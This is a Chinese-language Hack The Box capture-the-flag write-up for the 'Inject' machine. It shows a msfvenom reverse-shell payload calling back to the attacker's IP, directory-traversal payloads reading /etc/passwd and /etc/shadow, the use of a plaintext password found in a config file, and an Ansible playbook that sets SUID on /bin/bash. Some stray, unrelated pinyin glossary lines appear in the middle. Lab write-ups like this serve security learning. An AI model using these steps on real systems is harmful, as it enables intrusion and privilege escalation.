【黑盒子】注入攻擊【實戰報告】
首先
你好,我是一個垃圾偽工程師。
本文是我挑戰 Hack The Box(請參考以下鏈接)的「Inject」時的WriteUp。
請注意,該文不包含先前工具的詳細使用方式。
请不要滥用这些技术,而是只将其用于对社会的贡献,因为这样会触犯法律。
发现
端口扫描
这次我尝试使用RustScan进行快速扫描。
┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.11.204 --top --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
? https://admin.tryhackme.com
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.204:22
Open 10.10.11.204:8080
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 07:22 EDT
Initiating Ping Scan at 07:22
Scanning 10.10.11.204 [4 ports]
Completed Ping Scan at 07:22, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:22
Completed Parallel DNS resolution of 1 host. at 07:22, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 07:22
Scanning 10.10.11.204 [2 ports]
Discovered open port 8080/tcp on 10.10.11.204
Discovered open port 22/tcp on 10.10.11.204
Completed SYN Stealth Scan at 07:22, 0.24s elapsed (2 total ports)
Nmap scan report for 10.10.11.204
Host is up, received echo-reply ttl 63 (0.19s latency).
Scanned at 2023-03-17 07:22:16 EDT for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
8080/tcp open http-proxy syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
收集
寻找网站
目录搜索
使用dirsearch工具进行目录探索。
┌──(root㉿kali)-[~]
└─# dirsearch -u http://10.10.11.204:8080
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/10.10.11.204-8080/_23-03-17_07-23-22.txt
Error Log: /root/.dirsearch/logs/errors-23-03-17_07-23-22.log
Target: http://10.10.11.204:8080/
[07:23:22] Starting:
[07:23:47] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[07:23:49] 400 - 435B - /a%5c.aspx
[07:24:18] 200 - 5KB - /blogs
[07:24:29] 500 - 106B - /error
[07:24:30] 500 - 106B - /error/
[07:24:59] 200 - 6KB - /register
[07:25:10] 200 - 2KB - /upload
[07:25:10] 200 - 2KB - /upload/
Task Completed
初始访问
反向Shell
我决定尝试上传一个反向连接的 shell,而且暂时先以 ELF 文件形式创建它。
┌──(root㉿kali)-[~]
└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.95 LPORT=4444 -f elf -o reverse.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: reverse.elf
拉米酱上传
目录遍历攻击
从下面的负载列表中提取数据。
┌──(root㉿kali)-[~/work]
└─# wget https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Directory%20Traversal/Intruder/directory_traversal.txt
让我们试试吧!
┌──(root㉿kali)-[~/work]
└─# ffuf -w ./directory_traversal.txt:FUZZ -u http://10.10.11.204:8080/show_image?img=FUZZ -fc 500
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.204:8080/show_image?img=FUZZ
:: Wordlist : FUZZ: /root/work/directory_traversal.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 500
________________________________________________
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 191ms]
* FUZZ: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 183ms]
* FUZZ: ../../../../../../../../etc/passwd
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 185ms]
* FUZZ: ../../../../../../etc/passwd
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 194ms]
* FUZZ: ../../../../../../../../../etc/passwd
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 199ms]
* FUZZ: ../../../../../../../etc/passwd
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 251ms]
* FUZZ: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 181ms]
* FUZZ: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 184ms]
* FUZZ: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
[Status: 200, Size: 228, Words: 23, Lines: 10, Duration: 183ms]
* FUZZ: ../../../../../../../../../../../../etc/hosts
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 191ms]
* FUZZ: ../../../../../../../../../../../../etc/passwd
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 199ms]
* FUZZ: /../../../../../../../../../../etc/passwd
[Status: 200, Size: 1986, Words: 17, Lines: 38, Duration: 195ms]
* FUZZ: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[Status: 200, Size: 1345, Words: 1, Lines: 1, Duration: 206ms]
* FUZZ: ../../../../../../../../../../../../etc/shadow
[Status: 200, Size: 1345, Words: 1, Lines: 1, Duration: 207ms]
* FUZZ: /../../../../../../../../../../etc/shadow
[Status: 200, Size: 1345, Words: 1, Lines: 1, Duration: 193ms]
* FUZZ: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
:: Progress: [140/140] :: Job [1/1] :: 13 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-function-web</artifactId>
<version>3.2.2</version>
</dependency>
所以我进行了一番调查,结果出现了这样的情况。
这是关于公式的文章。
我打算积极攻击CVE-2022-22963。
2022年漏洞编号为CVE-2022-22963。
我們將使用以下的PoC。
坚持不懈 chí bù xiè)
坚持 chí) – to persist, to persevere
不懈 (bù xiè) – tirelessly, unremittingly
请根据以下“御用达”的网站参考,创建一个ReverseShell的命令。
为了建立反向 shell,准备好接收端。
┌──(root?kali)-[~/work]
└─# nc -lnvp 4444
listening on [any] 4444 ...
特权提升 – 横向
暂时先用Frank的脚本来查一下有没有什么值得关注的东西。
┌──(root㉿kali)-[~/work]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.95] from (UNKNOWN) [10.10.11.204] 33128
whoami
frank
ls -lta
total 76
drwxrwxrwt 15 root root 12288 Mar 17 12:48 tmp
drwxr-xr-x 26 root root 780 Mar 17 11:20 run
drwxr-xr-x 19 root root 4040 Mar 17 11:20 dev
dr-xr-xr-x 13 root root 0 Mar 17 11:19 sys
dr-xr-xr-x 257 root root 0 Mar 17 11:19 proc
drwx------ 6 root staff 4096 Mar 6 13:15 root
drwxr-xr-x 4 root root 4096 Mar 6 11:43 boot
drwxr-xr-x 110 root root 4096 Mar 6 11:21 etc
drwxr-xr-x 4 root root 4096 Feb 1 18:38 home
drwxr-xr-x 2 root root 4096 Feb 1 18:38 mnt
drwxr-xr-x 18 root root 4096 Feb 1 18:38 .
drwxr-xr-x 18 root root 4096 Feb 1 18:38 ..
drwxr-xr-x 13 root root 4096 Feb 1 18:19 var
drwxr-xr-x 3 root root 4096 Oct 20 04:23 opt
drwx------ 2 root root 16384 Apr 8 2022 lost+found
drwxr-xr-x 14 root root 4096 Feb 23 2022 usr
drwxr-xr-x 2 root root 4096 Feb 23 2022 media
drwxr-xr-x 2 root root 4096 Feb 23 2022 srv
lrwxrwxrwx 1 root root 7 Feb 23 2022 bin -> usr/bin
lrwxrwxrwx 1 root root 7 Feb 23 2022 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Feb 23 2022 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Feb 23 2022 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Feb 23 2022 libx32 -> usr/libx32
lrwxrwxrwx 1 root root 8 Feb 23 2022 sbin -> usr/sbin
cd /home/frank
ls -lta
total 28
drwx------ 2 frank frank 4096 Feb 1 18:38 .m2
drwxr-xr-x 3 frank frank 4096 Feb 1 18:38 .local
drwx------ 2 frank frank 4096 Feb 1 18:38 .cache
drwxr-xr-x 5 frank frank 4096 Feb 1 18:38 .
drwxr-xr-x 4 root root 4096 Feb 1 18:38 ..
lrwxrwxrwx 1 root root 9 Jan 24 13:57 .bash_history -> /dev/null
-rw-r--r-- 1 frank frank 3786 Apr 18 2022 .bashrc
-rw-r--r-- 1 frank frank 807 Feb 25 2020 .profile
听说发现了一些M2的隐藏层。我来调查一下这个层次。
cd .m2
ls -lta
total 12
drwx------ 2 frank frank 4096 Feb 1 18:38 .
drwxr-xr-x 5 frank frank 4096 Feb 1 18:38 ..
-rw-r----- 1 root frank 617 Jan 31 16:55 settings.xml
cat settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<servers>
<server>
<id>Inject</id>
<username>phil</username>
<password>DocPhillovestoInject123</password>
<privateKey>${user.home}/.ssh/id_dsa</privateKey>
<filePermissions>660</filePermissions>
<directoryPermissions>660</directoryPermissions>
<configuration></configuration>
</server>
</servers>
</settings>
由于发现了Phil的凭据,我试着使用这些信息进行登录。
顺便说一下,在SSH密码输入中会被拒绝,所以要执行su -命令。
su - phil
DocPhillovestoInject123
ls -lta
total 16
drwxr-xr-x 6 frank frank 4096 Mar 17 12:55 frank
drwxr-xr-x 3 phil phil 4096 Feb 1 18:38 phil
drwxr-xr-x 4 root root 4096 Feb 1 18:38 .
drwxr-xr-x 18 root root 4096 Feb 1 18:38 ..
cd phil
ls -lta
total 24
-rw-r----- 1 root phil 33 Mar 17 11:20 user.txt
drwx------ 2 phil phil 4096 Feb 1 18:38 .cache
drwxr-xr-x 3 phil phil 4096 Feb 1 18:38 .
drwxr-xr-x 4 root root 4096 Feb 1 18:38 ..
lrwxrwxrwx 1 root root 9 Feb 1 07:40 .bash_history -> /dev/null
-rw-r--r-- 1 phil phil 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 phil phil 807 Feb 25 2020 .profile
whoami
phil
我能成为Phil了。这样就获得了User标志!!!因为这个shell看起来很难看,所以我会用Python改成交互式shell。
python3 -c 'import pty; pty.spawn("bash")'
权限提升 – 垂直
调查
请列出可执行的sudo命令。
暫時使用sudo -l命令來尋找可能具有特權可使用的文件和指令。
phil@inject:~$ sudo -l
[sudo] password for phil:
Sorry, user phil may not run sudo on localhost.
不。
linpeas -> 随机/ 临时人
我决定使用linpeas脚本。相较于Linemun,我更倾向于这个选择。
请从以下网站下载linpeas.sh脚本。
┌──(root㉿kali)-[~/work]
└─# wget https://github.com/carlospolop/PEASS-ng/releases/download/20230312/linpeas.sh
出发。
phil@inject:/tmp$ chmod +x ./linpeas.sh
phil@inject:/tmp$ ./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
...省略
╔══════════╣ Executable files potentially added by user (limit 70)
2023-02-01+18:56:55.9583168900 /usr/local/sbin/laurel
2023-01-30+14:41:13.9270845020 /usr/local/bin/ansible-parallel
2022-04-08+08:30:24.8239423570 /etc/console-setup/cached_setup_terminal.sh
2022-04-08+08:30:24.8239423570 /etc/console-setup/cached_setup_keyboard.sh
2022-04-08+08:30:24.8239423570 /etc/console-setup/cached_setup_font.sh
╔══════════╣ Unexpected in /opt (usually empty)
total 12
drwxr-xr-x 3 root root 4096 Oct 20 04:23 .
drwxr-xr-x 18 root root 4096 Feb 1 18:38 ..
drwxr-xr-x 3 root root 4096 Oct 20 04:23 automation
╔══════════╣ Unexpected in root
...省略
我能确认在/opt目录下有些目录存在。
我会收集更多信息。
追踪程序
从以下网站上获取 pspy 的可执行文件。请下载64位版本。
┌──(root㉿kali)-[~/work]
└─# wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
进行执行。
phil@inject:/tmp$ chmod +x ./pspy64
phil@inject:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/03/17 13:24:32 CMD: UID=0 PID=23786 | /lib/systemd/systemd-udevd
2023/03/17 13:24:32 CMD: UID=1001 PID=23779 | ./pspy64
2023/03/17 13:24:32 CMD: UID=1001 PID=23616 | -bash
2023/03/17 13:24:32 CMD: UID=0 PID=23613 | su - phil
2023/03/17 13:24:32 CMD: UID=0 PID=23486 |
2023/03/17 13:24:32 CMD: UID=0 PID=22695 |
2023/03/17 13:24:32 CMD: UID=0 PID=22160 |
2023/03/17 13:24:32 CMD: UID=0 PID=21900 |
2023/03/17 13:24:32 CMD: UID=0 PID=21622 |
...省略
2023/03/17 13:27:49 CMD: UID=0 PID=23858 | sshd: [accepted]
2023/03/17 13:27:49 CMD: UID=113 PID=23859 | sshd: [net]
2023/03/17 13:27:56 CMD: UID=0 PID=23862 | sshd: [accepted]
2023/03/17 13:27:56 CMD: UID=0 PID=23861 | sshd: [accepted]
2023/03/17 13:27:56 CMD: UID=0 PID=23864 | sshd: [accepted]
2023/03/17 13:27:56 CMD: UID=113 PID=23865 | sshd: [net]
2023/03/17 13:27:56 CMD: UID=0 PID=23866 | /usr/sbin/sshd -D -R
2023/03/17 13:27:57 CMD: UID=113 PID=23867 | sshd: [net]
2023/03/17 13:27:57 CMD: UID=0 PID=23868 | sshd: [accepted]
2023/03/17 13:27:57 CMD: UID=113 PID=23869 | sshd: [net]
2023/03/17 13:27:57 CMD: UID=113 PID=23871 | sshd: [net]
2023/03/17 13:27:57 CMD: UID=0 PID=23870 | sshd: [accepted]
2023/03/17 13:27:57 CMD: UID=0 PID=23872 | /usr/sbin/sshd -D -R
2023/03/17 13:27:57 CMD: UID=113 PID=23873 | sshd: [net]
2023/03/17 13:27:57 CMD: UID=0 PID=23874 | /usr/sbin/sshd -D -R
2023/03/17 13:27:58 CMD: UID=113 PID=23875 | sshd: [net]
2023/03/17 13:28:01 CMD: UID=0 PID=23881 | sleep 10
2023/03/17 13:28:01 CMD: UID=0 PID=23880 | /usr/sbin/CRON -f
2023/03/17 13:28:01 CMD: UID=0 PID=23879 | /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
2023/03/17 13:28:01 CMD: UID=0 PID=23878 | /usr/sbin/CRON -f
2023/03/17 13:28:01 CMD: UID=0 PID=23877 | /usr/sbin/CRON -f
2023/03/17 13:28:01 CMD: UID=0 PID=23876 | /usr/sbin/CRON -f
2023/03/17 13:28:02 CMD: UID=0 PID=23884 | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml
2023/03/17 13:28:02 CMD: UID=0 PID=23883 | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml
2023/03/17 13:28:02 CMD: UID=0 PID=23885 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
2023/03/17 13:28:02 CMD: UID=0 PID=23887 | /bin/sh /sbin/ldconfig -p
2023/03/17 13:28:02 CMD: UID=0 PID=23888 |
2023/03/17 13:28:02 CMD: UID=0 PID=23889 |
2023/03/17 13:28:02 CMD: UID=0 PID=23891 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
2023/03/17 13:28:02 CMD: UID=0 PID=23892 |
2023/03/17 13:28:02 CMD: UID=0 PID=23893 | /bin/sh -c echo ~root && sleep 0
2023/03/17 13:28:02 CMD: UID=0 PID=23894 | /bin/sh -c echo ~root && sleep 0
2023/03/17 13:28:02 CMD: UID=0 PID=23895 |
2023/03/17 13:28:02 CMD: UID=0 PID=23896 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" && echo ansible-tmp-1679059682.9278324-23891-183458739308708="` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" ) && sleep 0
2023/03/17 13:28:02 CMD: UID=0 PID=23899 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" && echo ansible-tmp-1679059682.9278324-23891-183458739308708="` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" ) && sleep 0
2023/03/17 13:28:02 CMD: UID=0 PID=23897 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" && echo ansible-tmp-1679059682.9278324-23891-183458739308708="` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" ) && sleep 0
2023/03/17 13:28:02 CMD: UID=0 PID=23901 | mkdir /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708
2023/03/17 13:28:02 CMD: UID=0 PID=23902 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" && echo ansible-tmp-1679059682.9278324-23891-183458739308708="` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" ) && sleep 0
2023/03/17 13:28:02 CMD: UID=0 PID=23903 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" && echo ansible-tmp-1679059682.9278324-23891-183458739308708="` echo /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708 `" ) && sleep 0
2023/03/17 13:28:03 CMD: UID=0 PID=23904 |
2023/03/17 13:28:03 CMD: UID=0 PID=23905 | /bin/sh -c /bin/sh -c 'chmod u+x /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/ /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py && sleep 0'
2023/03/17 13:28:03 CMD: UID=0 PID=23906 | /bin/sh -c chmod u+x /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/ /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py && sleep 0
2023/03/17 13:28:03 CMD: UID=0 PID=23907 | sleep 0
2023/03/17 13:28:03 CMD: UID=0 PID=23908 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
2023/03/17 13:28:03 CMD: UID=0 PID=23909 | /bin/sh -c /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py && sleep 0
2023/03/17 13:28:03 CMD: UID=0 PID=23910 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23911 | uname -p
2023/03/17 13:28:03 CMD: UID=0 PID=23912 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23913 | /usr/bin/python3 -Es /usr/bin/lsb_release -a
2023/03/17 13:28:03 CMD: UID=0 PID=23914 |
2023/03/17 13:28:03 CMD: UID=0 PID=23917 |
2023/03/17 13:28:03 CMD: UID=0 PID=23918 |
2023/03/17 13:28:03 CMD: UID=0 PID=23919 |
2023/03/17 13:28:03 CMD: UID=0 PID=23920 |
2023/03/17 13:28:03 CMD: UID=0 PID=23921 |
2023/03/17 13:28:03 CMD: UID=0 PID=23922 |
2023/03/17 13:28:03 CMD: UID=0 PID=23923 |
2023/03/17 13:28:03 CMD: UID=0 PID=23926 |
2023/03/17 13:28:03 CMD: UID=0 PID=23927 |
2023/03/17 13:28:03 CMD: UID=0 PID=23930 |
2023/03/17 13:28:03 CMD: UID=0 PID=23931 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23932 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23933 |
2023/03/17 13:28:03 CMD: UID=0 PID=23934 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23935 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23936 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23937 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23938 |
2023/03/17 13:28:03 CMD: UID=0 PID=23939 |
2023/03/17 13:28:03 CMD: UID=0 PID=23940 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
2023/03/17 13:28:03 CMD: UID=0 PID=23941 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1679059682.9278324-23891-183458739308708/AnsiballZ_setup.py
...省略
正在运行playbook_1.yml。Ansible的基础设施自动化工具正在运行。请注意以下命令,可能会用于创建恶意playbook。
2023/03/17 13:28:02 CMD: UID=0 PID=23883 | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml
Ansible 是一种自动化工具。
创建以下的playbook.yml
- hosts: localhost
tasks:
- name: pre
shell: "chmod +s /bin/bash"
总结
希望这次同样能对安全工程师们提供帮助。
